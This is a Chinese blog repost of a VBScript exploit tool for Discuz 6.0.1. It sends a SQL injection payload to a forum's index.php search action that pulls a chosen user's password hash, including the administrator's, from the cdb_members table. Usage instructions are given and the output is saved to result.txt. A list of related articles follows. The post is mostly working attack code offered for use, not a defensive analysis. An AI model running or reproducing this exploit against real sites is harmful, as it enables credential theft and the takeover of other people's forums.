discuz 任意管理员密码漏洞利用工具 vbs代码

Dim strUrl,strSite,strPath,strUid
showB()
Set Args = Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub

获得的密码大家自己在result.txt中查找

更多关于Discuz论坛内容来自木庄网络博客

标签：Discuz论坛

相关阅读 >>

phpcms v9 整合discuz! x2.5 和ucenter 1.6.0详细图文教程

destoon实现调用当前栏目分类及子分类和三级分类的方法

php 分页函数multi() discuz

国外著名论坛程序ipb(invision power board)在nginx下的配置示例

基于discuz security.inc.php代码的深入分析

destoon切换城市后实现logo旁边显示地区名称的方法

discuz有关问题解决办法汇总(can not write to cache files)

php实现scws中文分词搜索的方法

怎样提高论坛ggad点击率？

php轻量级数据库操作类medoo增加、删除、修改、查询例子

更多相关阅读请进入《Discuz论坛》频道 >>

转载请注明出处：木庄网络博客 » discuz 任意管理员密码漏洞利用工具 vbs代码